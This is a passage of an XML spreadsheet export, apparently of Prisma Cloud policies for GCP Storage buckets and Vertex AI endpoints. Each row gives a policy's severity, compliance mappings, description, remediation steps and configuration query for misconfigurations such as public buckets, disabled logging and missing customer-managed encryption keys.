          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-storage-buckets-list' AND json.rule = '(acl[*].email exists and acl[*].email contains logging) and (versioning.enabled is false or versioning does not exist)'</t>
        </is>
      </c>
      <c r="AA2993" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2993" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2993" t="inlineStr">
        <is>
          <t>PC-GCP-STO-201</t>
        </is>
      </c>
      <c r="AD2993" t="b">
        <v>1</v>
      </c>
      <c r="AE2993" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2993" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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Pramm-XSIAM - Notifications:azure_service_bus_queue, AccountGroups:Pramm-XSIAM;,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Rehan-Zoom-CIEM-AlertRule - Notifications:, AccountGroups:PCS GCP Accounts;,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enwankwo-azure-acount-group-alert-rule - Notifications:, AccountGroups:enwankwo-azure-acount-group;,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3" t="inlineStr">
        <is>
          <t>e1984e80-f467-413d-9001-f2ada7e3a377</t>
        </is>
      </c>
      <c r="AI2993" t="inlineStr">
        <is>
          <t>5c78818c-0fbd-4def-9e67-44c08cad77a8</t>
        </is>
      </c>
      <c r="AJ2993" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2993" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2994">
      <c r="A2994" t="inlineStr"/>
      <c r="B2994" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2994" s="2" t="inlineStr"/>
      <c r="D2994" t="inlineStr"/>
      <c r="E2994" t="inlineStr"/>
      <c r="F2994" t="inlineStr"/>
      <c r="G2994" t="b">
        <v>1</v>
      </c>
      <c r="H29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94" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2994" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2994" t="inlineStr">
        <is>
          <t>AI model theft risk due to unmonitored and publicly exposed Storage Bucket containing GCP Vertex AI model</t>
        </is>
      </c>
      <c r="L2994" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2994" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2994" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2994" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2994" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2994" t="inlineStr"/>
      <c r="R2994" t="inlineStr"/>
      <c r="S2994" t="inlineStr"/>
      <c r="T2994" t="b">
        <v>0</v>
      </c>
      <c r="U2994" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2994" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2994" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed GCP Storage buckets that are used to store Vertex AI model and do not have usage and storage logging enabled.
Storage bucket usage logs provide information for all of the requests made on a specified bucket and are created hourly and storage logs provide information about the storage consumption of that bucket for the last day and are created daily. Enabling usage and storage logs for the storage bucket containing sensitive Vertex AI pipeline output data enables monitoring access to Vertex AI model and helps in traceback in case of security breaches.
It is recommended to enable usage and storage logging for the storage buckets containing Vertex AI model.</t>
        </is>
      </c>
      <c r="X2994"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Follow the steps mentioned in the below link to enable Access and Storage logs:
Reference : https://cloud.google.com/storage/docs/access-logs</t>
        </is>
      </c>
      <c r="Y2994" t="inlineStr"/>
      <c r="Z2994" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-storage-buckets-list') and finding.name contains all ('GCP Storage Bucket storing Vertex AI model','GCP Storage buckets are publicly accessible to all users','GCP Storage buckets are publicly accessible to all authenticated users','GCP Storage Bucket does not have Access and Storage Logging enabled')</t>
        </is>
      </c>
      <c r="AA2994" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2994" t="inlineStr">
        <is>
          <t>2024-07-19 06:56:53</t>
        </is>
      </c>
      <c r="AC2994" t="inlineStr"/>
      <c r="AD2994" t="b">
        <v>1</v>
      </c>
      <c r="AE2994" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2994" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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94" t="inlineStr">
        <is>
          <t>8a27762d-3768-4f63-a8b2-e653fcf5d693</t>
        </is>
      </c>
      <c r="AI2994" t="inlineStr">
        <is>
          <t>e8f04e14-2c76-43f2-998b-0376252d4374</t>
        </is>
      </c>
      <c r="AJ2994" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2994" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2995">
      <c r="A2995" t="inlineStr">
        <is>
          <t>HIPAA, CSA CCM v4.0.12, ISO/IEC 27001:2022, CIS Controls v8.1, ISO/IEC 27001:2022, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, GDPR, Microsoft Cloud Security Benchmark v1, DORA, TX-RAMP Level 1, SOC 2, HIPAA, NYDFS 23 CRR-NY 500.0, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2995" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2995" s="2" t="inlineStr"/>
      <c r="D2995" t="inlineStr"/>
      <c r="E2995" t="inlineStr"/>
      <c r="F2995" t="inlineStr"/>
      <c r="G2995" t="b">
        <v>1</v>
      </c>
      <c r="H29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5" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2995" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2995" t="inlineStr">
        <is>
          <t>GCP Storage Bucket encryption not configured with Customer-Managed Encryption Key (CMEK)</t>
        </is>
      </c>
      <c r="L2995" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2995" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2995" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2995" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2995" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2995" t="inlineStr">
        <is>
          <t>SC</t>
        </is>
      </c>
      <c r="R2995" t="inlineStr">
        <is>
          <t>Cryptographic Key Establishment and Management</t>
        </is>
      </c>
      <c r="S2995" t="inlineStr"/>
      <c r="T2995" t="b">
        <v>0</v>
      </c>
      <c r="U2995" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2995" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2995" t="inlineStr">
        <is>
          <t>This policy identifies GCP Storage Buckets that are not configured with a Customer-Managed Encryption key.
GCP Storage Buckets might contain sensitive information. Google Cloud Storage service encrypts all data within the buckets using Google-managed encryption keys by default but users can specify Customer-Managed Keys (CMKs) to get enhanced security, control over the encryption key, and also comply with any regulatory requirements.
As a security best practice, the use of CMK to encrypt your Storage bucket is advisable as it gives you full control over the encrypted data.</t>
        </is>
      </c>
      <c r="X2995" t="inlineStr">
        <is>
          <t>To update the GCP storage bucket with customer-managed encryption, follow the below steps:
1. Sign in to the Google Cloud Management Console. Navigate to the Cloud Storage Buckets page.
2. Click on the name of the bucket where you want to enable customer-managed encryption.
3. Under the 'Configuration' tab, under the 'Protection' section, select the 'Edit encryption type' option.
4. A 'Edit encryption' dialogue box will appear. Select the 'Customer-managed encryption key' option.
5. Under the 'Select a customer-managed key' dropdown, select the KMS key to be used for encryption.
6. Click on 'SAVE'.
Note: Make sure the storage bucket service account has cloudkms.cryptoKeyEncrypterDecrypter permissions to encrypt or decrypt with the selected key.</t>
        </is>
      </c>
      <c r="Y2995" t="inlineStr"/>
      <c r="Z2995" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-storage-buckets-list' AND json.rule = encryption.defaultKmsKeyName does not exist</t>
        </is>
      </c>
      <c r="AA2995" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2995" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2995" t="inlineStr">
        <is>
          <t>PC-GCP-STO-1132</t>
        </is>
      </c>
      <c r="AD2995" t="b">
        <v>1</v>
      </c>
      <c r="AE2995" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2995" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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5" t="inlineStr">
        <is>
          <t>6e265c5b-4c9c-4190-8a20-1bda582b9292</t>
        </is>
      </c>
      <c r="AI2995" t="inlineStr">
        <is>
          <t>e9e07320-de61-49d1-bb03-caeac41505d5</t>
        </is>
      </c>
      <c r="AJ2995" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2995" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2996">
      <c r="A2996" t="inlineStr"/>
      <c r="B2996" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2996" s="2" t="inlineStr"/>
      <c r="D2996" t="inlineStr"/>
      <c r="E2996" t="inlineStr"/>
      <c r="F2996" t="inlineStr"/>
      <c r="G2996" t="b">
        <v>1</v>
      </c>
      <c r="H29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96" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2996" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2996" t="inlineStr">
        <is>
          <t>Sensitive data exposure risk due to publicly exposed Storage Bucket containing GCP Vertex AI pipeline output data</t>
        </is>
      </c>
      <c r="L2996" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2996" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2996" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2996" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2996" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2996" t="inlineStr"/>
      <c r="R2996" t="inlineStr"/>
      <c r="S2996" t="inlineStr"/>
      <c r="T2996" t="b">
        <v>0</v>
      </c>
      <c r="U2996" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2996" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2996" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed GCP storage buckets that contain GCP Vertex AI pipeline output data.
GCP Vertex AI pipeline uses GCP storage buckets to store pipeline output artifacts. This includes outputs by pipeline runs and individual pipeline steps in an organized manner. Making a bucket public that stores Vertex AI Pipeline data can expose sensitive model artifacts and logs to unauthorized access, leading to potential data breaches and intellectual property loss.
It is recommended to keep buckets private if they are used for storing GCP Vertex AI pipeline output data.</t>
        </is>
      </c>
      <c r="X2996"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Review and validate that the GCP Vertex AI pipeline output data is stored in the right Storage bucket. Move and/or delete the output data if it is found in an unexpected location. Review how the Vertex AI pipeline was configured to output to an unauthorized/unapproved storage bucket.</t>
        </is>
      </c>
      <c r="Y2996" t="inlineStr"/>
      <c r="Z2996" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-storage-buckets-list') and finding.name contains all ('GCP Storage Bucket storing GCP Vertex AI pipeline output data','GCP Storage buckets are publicly accessible to all authenticated users','GCP Storage buckets are publicly accessible to all users')</t>
        </is>
      </c>
      <c r="AA2996" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2996" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:42</t>
        </is>
      </c>
      <c r="AC2996" t="inlineStr"/>
      <c r="AD2996" t="b">
        <v>1</v>
      </c>
      <c r="AE2996" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2996" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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96" t="inlineStr">
        <is>
          <t>5f19a1a6-c0cd-4acd-9340-72b7f0c3f925</t>
        </is>
      </c>
      <c r="AI2996" t="inlineStr">
        <is>
          <t>7339bd25-ec17-467a-8fef-b5ad6fa6bc99</t>
        </is>
      </c>
      <c r="AJ2996" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2996" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2997">
      <c r="A2997" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, CRI Profile v2.0, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, PCI DSS v4.0, NIST CSF v2.0, ISO/IEC 27017:2015, ISO 27002:2022, Risk Management in Technology (RMiT), Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, ITSG-33, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, PCI DSS v4.0, MITRE ATT&amp;CK v12, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, MITRE ATT&amp;CK v8.2 [Deprecated], NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, New Zealand Information Security Manual (NZISM v3.4), Cybersecurity Maturity Model Certification (CMMC) v.1.02, CIS Controls v8, CSA CCM v.4.0.1, GDPR, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, kfirdaus AWS Account-CS, CIS Controls v7.1, ISO/IEC 27001:2022, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), ISO 27001:2013, ISO 27001:2013, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), PCI DSS v4.0, ISO 27002:2022, CSA CCM v.4.0.6, TX-RAMP Level 1, NIST SP 800-171 Revision 2, Secure Controls Framework (SCF) - 2022.2.1, NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, CSA CCM v4.0.12, NIST CSF v2.0, Copy of ACSC Information Security Manual (ISM)-clone, CSA CCM v4.0.12, MITRE ATT&amp;CK v6.3 [Deprecated], RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.11.2.0, Copy of CIS Controls v8, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, FFIEC, CSA CCM v.4.0.1, SOC 2, CIS Controls v8.1, CRI Profile v2.0, PCI DSS v4.0, Risk Management in Technology (RMiT), Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, NIST 800-53 Rev4, CRI Profile v1.2.1, ISO 27001:2013, ISO 27002:2022, kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, Copy of New Zealand Information Security Manual (NZISM v3.4), CIS Controls v7.1, ISO/IEC 27002:2013, SOC 2, PCI DSS v4.0, SOC 2, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, PIPEDA, NIST CSF, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Fedramp (Moderate), CRI Profile v1.2.1, CSA CCM v.4.0.6, ISO 27001:2013, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2)</t>
        </is>
      </c>
      <c r="B2997" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2997" s="2" t="inlineStr"/>
      <c r="D2997" t="inlineStr"/>
      <c r="E2997" t="inlineStr"/>
      <c r="F2997" t="inlineStr"/>
      <c r="G2997" t="b">
        <v>0</v>
      </c>
      <c r="H29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2997" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2997" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2997" t="inlineStr">
        <is>
          <t>GCP Bucket containing Operations Suite Logs have bucket logging disabled</t>
        </is>
      </c>
      <c r="L2997" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2997" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2997" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2997" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2997" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2997" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2997" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2997" t="inlineStr"/>
      <c r="T2997" t="b">
        <v>0</v>
      </c>
      <c r="U2997" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2997" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2997" t="inlineStr">
        <is>
          <t>This policy identifies the buckets containing Operations Suite Logs for which logging is disabled. Enabling bucket logging, logs all the requests made on the bucket which can be used for debugging and forensics. It is recommended to enable logging on the buckets containing Operations Suite Logs.</t>
        </is>
      </c>
      <c r="X2997" t="inlineStr">
        <is>
          <t>Follow the below mentioned URL to enable logging for a bucket:
https://cloud.google.com/storage/docs/access-logs</t>
        </is>
      </c>
      <c r="Y2997" t="inlineStr"/>
      <c r="Z2997" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name= 'gcloud-storage-buckets-list' AND json.rule = '($.logging does not exist or $.logging equals null) and ($.acl[*].email exists and $.acl[*].email contains logging)'</t>
        </is>
      </c>
      <c r="AA2997" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2997" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2997" t="inlineStr">
        <is>
          <t>PC-GCP-STO-132</t>
        </is>
      </c>
      <c r="AD2997" t="b">
        <v>1</v>
      </c>
      <c r="AE2997" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2997" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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2997" t="inlineStr">
        <is>
          <t>747f25ad-9dbf-4561-a56a-de598e8b4d4a</t>
        </is>
      </c>
      <c r="AI2997" t="inlineStr">
        <is>
          <t>b32897b5-668f-4101-b6a6-3b1ffaf2d49a</t>
        </is>
      </c>
      <c r="AJ2997" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2997" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2998">
      <c r="A2998" t="inlineStr"/>
      <c r="B2998" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C2998" s="2" t="inlineStr"/>
      <c r="D2998" t="inlineStr"/>
      <c r="E2998" t="inlineStr"/>
      <c r="F2998" t="inlineStr"/>
      <c r="G2998" t="b">
        <v>1</v>
      </c>
      <c r="H29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2998" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2998" t="inlineStr">
        <is>
          <t>gcloud-storage</t>
        </is>
      </c>
      <c r="K2998" t="inlineStr">
        <is>
          <t>AI model theft risk due to publicly exposed Storage Bucket containing GCP Vertex AI model</t>
        </is>
      </c>
      <c r="L2998" t="inlineStr">
        <is>
          <t>MISCONFIGURATION,PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M2998" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2998" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2998" t="inlineStr">
        <is>
          <t>attack_path</t>
        </is>
      </c>
      <c r="P2998" t="inlineStr">
        <is>
          <t>misconfig</t>
        </is>
      </c>
      <c r="Q2998" t="inlineStr"/>
      <c r="R2998" t="inlineStr"/>
      <c r="S2998" t="inlineStr"/>
      <c r="T2998" t="b">
        <v>0</v>
      </c>
      <c r="U2998" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2998" t="inlineStr">
        <is>
          <t>gcloud-storage-buckets-list</t>
        </is>
      </c>
      <c r="W2998" t="inlineStr">
        <is>
          <t>This policy identifies publicly exposed GCP storage buckets that contain the GCP Vertex AI model.
GCP Vertex AI models (except AutoML Models) are stored in buckets. Making a bucket public that stores the Vertex AI model can expose sensitive model artifacts to unauthorized access, leading to potential data breaches and intellectual property loss.
It is recommended to keep buckets private if they are used for storing the GCP Vertex AI model.</t>
        </is>
      </c>
      <c r="X2998" t="inlineStr">
        <is>
          <t>[PUBLIC_ACCESS]
To remove public access from a bucket, either enable "Public access prevention" or edit/remove any permissions granted to 'allUsers' and 'allAuthenticatedUsers' on a bucket.
To edit/remove permissions granted over the bucket, follow the instructions below:
1. Login to GCP Portal
2. Go to the Cloud Storage Buckets page.
3. Go to Buckets
4. Click on the Storage bucket for which alert has been generated
5. Select the Permissions tab near the top of the page.
6. Edit/remove any permissions granted to 'allUsers' and 'allAuthenticatedUsers'
To prevent public access over the bucket, follow the instructions below:
1. Login to GCP Portal
2. Go to the Cloud Storage Buckets page.
3. Go to Buckets
4. Click on the Storage bucket for which alert has been generated
5. Select the Permissions tab near the top of the page.
6. In the Public access card, click 'Prevent public access' to enforce public access prevention.
[MISCONFIGURATION]
Review and validate that the Vertex AI models are stored in the right Storage buckets. Move and/or delete the model and other related artifacts if they are found in an unexpected location. Review how the model was uploaded to an unauthorized/unapproved storage bucket.</t>
        </is>
      </c>
      <c r="Y2998" t="inlineStr"/>
      <c r="Z2998" t="inlineStr">
        <is>
          <t>asset WHERE asset.type IN ('gcloud-storage-buckets-list') and finding.name contains all ('GCP Storage Bucket storing Vertex AI model','GCP Storage buckets are publicly accessible to all authenticated users','GCP Storage buckets are publicly accessible to all users')</t>
        </is>
      </c>
      <c r="AA2998" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2998" t="inlineStr">
        <is>
          <t>2024-07-08 06:43:42</t>
        </is>
      </c>
      <c r="AC2998" t="inlineStr"/>
      <c r="AD2998" t="b">
        <v>1</v>
      </c>
      <c r="AE2998" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2998" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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98" t="inlineStr">
        <is>
          <t>fe19bc1e-17ff-476d-a70a-5806aaf31733</t>
        </is>
      </c>
      <c r="AI2998" t="inlineStr">
        <is>
          <t>ae5b25ac-dab2-4a98-b71d-8a706aa03a13</t>
        </is>
      </c>
      <c r="AJ2998" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2998" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2999">
      <c r="A2999" t="inlineStr"/>
      <c r="B2999" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2999" s="2" t="inlineStr"/>
      <c r="D2999" t="inlineStr"/>
      <c r="E2999" t="inlineStr"/>
      <c r="F2999" t="inlineStr"/>
      <c r="G2999" t="b">
        <v>1</v>
      </c>
      <c r="H29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2999" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2999" t="inlineStr">
        <is>
          <t>gcloud-vertex</t>
        </is>
      </c>
      <c r="K2999" t="inlineStr">
        <is>
          <t>GCP Vertex AI Endpoint not encrypted with CMEK</t>
        </is>
      </c>
      <c r="L2999" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2999" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N2999" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2999" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2999" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2999" t="inlineStr"/>
      <c r="R2999" t="inlineStr"/>
      <c r="S2999" t="inlineStr"/>
      <c r="T2999" t="b">
        <v>0</v>
      </c>
      <c r="U2999" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2999" t="inlineStr">
        <is>
          <t>gcloud-vertex-ai-aiplatform-endpoint</t>
        </is>
      </c>
      <c r="W2999" t="inlineStr">
        <is>
          <t>This policy identifies GCP Vertex AI Endpoints that are not encrypted with CMEK.
Customer Managed Encryption Keys (CMEK) for a Vertex AI Endpoint provide control over the encryption of data at rest. Encrypting GCP Vertex AI Endpoints with CMEK enhances security by giving you full control over encryption keys. This ensures data protection, especially for sensitive models and predictions. CMEK allows key rotation and revocation, aligning with compliance requirements and offering better data privacy management.
It is recommended to use CMEK for Vertex AI Endpoint encryption.</t>
        </is>
      </c>
      <c r="X2999" t="inlineStr">
        <is>
          <t>GCP Vertex AI Endpoint encryption cannot be changed after creation. To make use of CMEK a new Endpoint can be created.
To create a new Vertex AI Endpoint, please follow the steps below:
1. Login to the GCP console
2. Navigate to the 'Vertex AI' service
3. In side panel, under 'DEPLOY AND USE', go to 'Online prediction'
4. Select 'ENDPOINTS' tab
5. Click 'CREATE'
6. Configure the endpoint name and access as required
7. Click on 'ADVANCED OPTIONS', and then select 'Cloud KMS key'
8. Select the appropriate 'Key type' and then select the required CMEK
9. Click 'CONTINUE'
10. Configure the Model settings as required, click 'CONTINUE'
11. Configure the Model monitoring as required, click 'CONTINUE'
12. Click 'CREATE'
To delete an existing Vertex AI Endpoint, please follow the steps below:
1. Login to the GCP console
2. Navigate to the 'Vertex AI' service
3. In side panel, under 'DEPLOY AND USE', go to 'Online prediction'
4. Select 'ENDPOINTS' tab
5. Click on the alerting endpoint
6. Click on 'View More' bottom (three dots) for any model from the list.
7. Click 'Undeploy model from endpoint'
8. In the Undeploy model from endpoint dialog, click 'Undeploy'
9. Repeat step 6-8 for all models listed
10. Go back to 'Online prediction' page
11. Select the alerting endpoint checkbox
12. Click 'DELETE'</t>
        </is>
      </c>
      <c r="Y2999" t="inlineStr"/>
      <c r="Z2999" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-vertex-ai-aiplatform-endpoint' AND json.rule = encryptionSpec.kmsKeyName does not exist</t>
        </is>
      </c>
      <c r="AA2999" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2999" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2999" t="inlineStr">
        <is>
          <t>PC-GCP-GVAIP-1308</t>
        </is>
      </c>
      <c r="AD2999" t="b">
        <v>1</v>
      </c>
      <c r="AE2999" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2999" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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2999" t="inlineStr">
        <is>
          <t>48cb241d-5863-425c-aa44-a526824b44fa</t>
        </is>
      </c>
      <c r="AI2999" t="inlineStr">
        <is>
          <t>1d5fd945-fd09-46c2-9da5-affc9f3a129a</t>
        </is>
      </c>
      <c r="AJ2999" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2999" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="3000">
      <c r="A3000" t="inlineStr">
        <is>
          <t>Secure Controls Framework (SCF) - 2024.2</t>
        </is>
      </c>
      <c r="B3000" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C3000" s="2" t="inlineStr"/>
      <c r="D3000" t="inlineStr"/>
      <c r="E3000" t="inlineStr"/>
      <c r="F3000" t="inlineStr"/>
      <c r="G3000" t="b">
        <v>1</v>
      </c>
